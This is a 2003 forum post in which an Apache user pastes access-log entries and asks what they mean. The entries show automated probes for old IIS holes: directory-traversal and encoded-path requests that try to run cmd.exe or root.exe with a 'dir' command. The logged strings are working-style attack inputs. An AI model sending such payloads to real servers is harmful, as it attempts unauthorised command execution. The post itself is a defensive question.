|
-
November 18th, 2003, 03:32 PM
#1
Junior Member
 Apache under attack from IIS server?
I'm running a little old computer with apache, and I keep getting some very intresting logs in the Apache access.log file...
[ip] - - [18/11/03:12:36:11 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 294
[ip] - - [18/11/03:12:36:11 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
[ip] - - [18/11/03:12:36:11 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
[ip] - - [18/11/03:12:36:11 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
[ip] - - [18/11/03:12:36:12 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
[ip] - - [18/11/03:12:36:12 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
[ip] - - [18/11/03:12:36:12 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
[ip] - - [18/11/03:12:36:12 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
[ip] - - [18/11/03:12:36:12 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 303
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
[ip] - - [18/11/03:12:36:14 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
[ip] - - [18/11/03:12:36:14 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
Thankfully all are 404 or 400'ed, but Im worried that its doing more than just that. Im actualy worried that its in the system. Im behind two firewalls [software and hardware], but I still feel insecure about it. I want to run the Apache though because I host a few documents off of it...
If anyone can tell me whats happning in those logs and what could be the attacking party, it would help, because this shows up alot in my logs! 
Thanks for your time in reading this;
NeoThermic
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote